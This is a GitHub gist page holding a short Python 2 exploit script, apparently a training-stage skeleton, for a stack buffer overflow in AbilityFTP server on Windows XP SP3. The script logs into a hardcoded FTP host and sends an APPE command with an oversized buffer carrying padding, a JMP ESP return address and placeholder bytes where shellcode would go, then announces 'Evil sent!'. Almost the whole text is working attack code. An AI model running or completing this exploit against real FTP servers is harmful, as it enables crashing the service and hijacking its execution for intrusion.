Skip to content

Instantly share code, notes, and snippets.

@mackwage

mackwage/AbilityFTPxp-4

Created August 17, 2017 02:05
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save mackwage/778d87af76c4aca01133950f0b71500d to your computer and use it in GitHub Desktop.
Save mackwage/778d87af76c4aca01133950f0b71500d to your computer and use it in GitHub Desktop.
Download ZIP
AbilityFTP overflow skeleton phase 4 for xp
Raw
AbilityFTPxp-4
#!/usr/bin/python
from socket import *
import sys, struct, os, time
host = "10.10.10.73"
port = 21
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(2000)
time.sleep(2)
buffer = "\x41" * 968
buffer += "\x53\x93\x42\x7E" #7E429353 JMP ESP WinXP SP3 ENG
buffer += "\x43" * 528
buffer += "\r\n"
print "[+] length: %d" % (len(buffer))
s.send('USER ftp\r\n')
print s.recv(2000)
s.send('PASS ftp\r\n')
print s.recv(2000)
s.send('APPE '+buffer)
print s.recv(2000)
print "[+] Evil sent!"
s.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment